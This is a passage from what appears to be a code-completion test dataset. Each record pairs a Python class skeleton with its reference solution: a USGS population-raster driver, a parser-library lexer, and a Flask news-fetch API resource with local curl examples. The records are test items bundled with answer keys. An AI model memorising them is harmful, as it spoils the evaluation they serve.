population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\n\nMethod signatures and docstrings:\n- def __init__(self, pop_directory=None, lazy_load=False): Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\n- def LoadRaster(self, box=None): Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\n- def GetPopulationDensity(self, latitudes, longitudes): Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).", "prompted_full_text": "Implement the Python class `UsgsPopDriver` described below.\n\nClass description:\nUSGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\n\nMethod signatures and docstrings:\n- def __init__(self, pop_directory=None, lazy_load=False): Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\n- def LoadRaster(self, box=None): Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\n- def GetPopulationDensity(self, latitudes, longitudes): Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\n\n<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "revision_id": "19f2ae9c1a1844e2f2ca2ceddd07f392249741e6", "skeleton": "<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lib/usgs_pop/usgs_pop_driver.py", "source_repo": "Wireless-Innovation-Forum/Spectrum-Access-System", "split": "test", "star_events_count": 64} {"blob_id": "807adff37fd9c036da645c3db7a1ba8df2a2ea0d", "bodies": ["super(Lexer, self).__init__(TOKENS, TokenNamespace)\nif t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\nif s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\nself._arg(matcher=matcher)\nself._arg(tokens=tokens)\nself._arg(alphabet=alphabet)\nself._arg(discard=discard)\nself._karg(t_regexp=t_regexp)\nself._karg(s_regexp=s_regexp)\nself._karg(source=source)", "for token in self.tokens:\n if token.id_ == id_:\n return token", "if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\nelse:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\ngenerator = self.matcher._match(tokens)\nwhile True:\n result, stream_out = (yield generator)\n yield (result, stream_out)"], "bodies_text": "<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "class_docstring": "This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.", "class_name": "Lexer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000136", "length_bytes": 15248, "license_type": "permissive", "methods": [{"docstring": "matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.", "name": "__init__", "signature": "def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None)"}, {"docstring": "A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).", "name": "token_for_id", "signature": "def token_for_id(self, id_)"}, {"docstring": "Implement matching - pass token stream to tokens.", "name": "_match", "signature": "def _match(self, stream)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005933", "prompt": "Implement the Python class `Lexer` described below.\n\nClass description:\nThis takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\n\nMethod signatures and docstrings:\n- def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None): matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\n- def token_for_id(self, id_): A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\n- def _match(self, stream): Implement matching - pass token stream to tokens.", "prompted_full_text": "Implement the Python class `Lexer` described below.\n\nClass description:\nThis takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\n\nMethod signatures and docstrings:\n- def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None): matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\n- def token_for_id(self, id_): A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\n- def _match(self, stream): Implement matching - pass token stream to tokens.\n\n<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n<|end_body_0|>\n\n<|body_start_1|>\n for token in self.tokens:\n if token.id_ == id_:\n return token\n<|end_body_1|>\n\n<|body_start_2|>\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n<|end_body_2|>\n", "revision_id": "84386a0a82c8d657f8bb57aa0399fc251fa581c3", "skeleton": "<|skeleton|>\nclass Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n <|body_0|>\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n <|body_1|>\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Lexer:\n \"\"\"This takes a set of regular expressions and provides a matcher that converts a stream into a stream of tokens, passing the new stream to the embedded matcher. It is added to the matcher graph by the lexer_rewriter; it is not specified explicitly by the user.\"\"\"\n\n def __init__(self, matcher, tokens, alphabet, discard, t_regexp=None, s_regexp=None, source=None):\n \"\"\"matcher is the head of the original matcher graph, which will be called with a tokenised stream. tokens is the set of `Token` instances that define the lexer. alphabet is the alphabet for which the regexps are defined. discard is the regular expression for spaces (which are silently dropped if not token can be matcher). t_regexp and s_regexp are internally compiled state, use in cloning, and should not be provided by non-cloning callers. source is the source used to generate the final stream.\"\"\"\n super(Lexer, self).__init__(TOKENS, TokenNamespace)\n if t_regexp is None:\n unique = {}\n for token in tokens:\n token.compile(alphabet)\n self._debug(format('Token: {0}', token))\n unique[token.id_] = token\n t_regexp = Compiler.multiple(alphabet, [(t.id_, t.regexp) for t in unique.values()]).dfa()\n if s_regexp is None and discard is not None:\n s_regexp = Compiler.single(alphabet, discard).dfa()\n self._arg(matcher=matcher)\n self._arg(tokens=tokens)\n self._arg(alphabet=alphabet)\n self._arg(discard=discard)\n self._karg(t_regexp=t_regexp)\n self._karg(s_regexp=s_regexp)\n self._karg(source=source)\n\n def token_for_id(self, id_):\n \"\"\"A utility that checks the known tokens for a given ID. The ID is used internally, but is (by default) an unfriendly integer value. Note that a lexed stream associates a chunk of input with a list of IDs - more than one regexp may be a maximal match (and this is a feature, not a bug).\"\"\"\n for token in self.tokens:\n if token.id_ == id_:\n return token\n\n def _match(self, stream):\n \"\"\"Implement matching - pass token stream to tokens.\"\"\"\n if isinstance(stream, LocationStream):\n tokens = lexed_location_stream(self.t_regexp, self.s_regexp, stream, self.source)\n else:\n if self.source:\n raise RuntimeLexerError('Source specified for simple stream')\n tokens = lexed_simple_stream(self.t_regexp, self.s_regexp, stream)\n generator = self.matcher._match(tokens)\n while True:\n result, stream_out = (yield generator)\n yield (result, stream_out)\n", "source": "the_stack_v2_python_sparse", "source_path": "lepl/lexer/matchers.py", "source_repo": "alexmac/ifdef-refactor", "split": "test", "star_events_count": 3} {"blob_id": "7d11ffbca1b56700327d9bf296d078a445458f85", "bodies": ["filter_parser = reqparse.RequestParser(bundle_errors=True)\nfilter_parser.add_argument('last_pk', type=int, default=0, location='args')\nfilter_parser.add_argument('limit_num', type=int, default=20, location='args')\nfilter_parser_args = filter_parser.parse_args()\ndata = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\nresult = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\nreturn jsonify(result)", "request_args = request_parser.parse_args()\nrequest_item_args = request_parser_item_post.parse_args(req=request_args)\nif not request_item_args:\n raise BadRequest('Bad request.')\nrequest_data = request_item_args\nresult = add_fetch_result(request_data)\nif result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\nelse:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)"], "bodies_text": "<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "class_docstring": "FetchResultListResource", "class_name": "FetchResultListResource", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000137", "length_bytes": 11580, "license_type": "permissive", "methods": [{"docstring": "Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:", "name": "get", "signature": "def get(self)"}, {"docstring": "Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201", "name": "post", "signature": "def post(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006001", "prompt": "Implement the Python class `FetchResultListResource` described below.\n\nClass description:\nFetchResultListResource\n\nMethod signatures and docstrings:\n- def get(self): Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\n- def post(self): Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

